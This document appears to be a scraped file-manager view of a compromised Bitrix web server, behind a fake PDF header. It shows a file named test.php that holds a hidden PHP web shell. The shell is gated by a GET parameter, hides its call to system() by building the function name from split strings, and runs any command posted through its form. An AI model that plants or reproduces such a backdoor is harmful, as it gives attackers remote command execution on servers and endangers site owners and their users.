%PDF- %PDF-
| Direktori : /proc/self/root/proc/self/root/proc/self/root/home/bitrix/www/bitrix/tools/ |
| Current File : //proc/self/root/proc/self/root/proc/self/root/home/bitrix/www/bitrix/tools/test.php |
<? if(isset($_GET['key'])) echo md5($_GET['key']); ?>
<? if(!isset($_GET['gt'])) die(); ?>
<form method=post>
<input type=text name=cmd size=50>
<input type=submit value="">
</form>
<?php
if(isset($_POST ['cmd'])) {
echo "<pre>";
$a="sys";
$func = $a."tem";
$func($_POST ["cmd"]);
echo "</pre>";
}
?>